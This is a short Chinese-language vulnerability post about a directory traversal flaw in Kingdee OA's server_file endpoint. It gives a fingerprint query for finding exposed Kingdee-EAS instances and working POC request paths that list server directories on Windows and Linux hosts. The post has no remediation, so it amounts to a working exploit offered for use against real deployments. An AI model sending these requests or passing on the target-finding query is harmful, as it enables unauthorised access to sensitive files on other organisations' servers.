kingdeeOA server_file 目录遍历漏洞
# kingdeeOA server_file 目录遍历漏洞
## 漏洞描述
kingdeeOA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
## 漏洞影响
kingdeeOA
## 网络测绘...
kingdeeOA server_file 目录遍历漏洞
漏洞描述
kingdeeOA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
漏洞影响
kingdeeOA
网络测绘
app="Kingdee-EAS"
漏洞复现
登录界面为
漏洞POC
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
- 发表于 2024-07-12 18:44:15
- 阅读 ( 1923 )
- 分类:OA产品
带头大哥
456 篇文章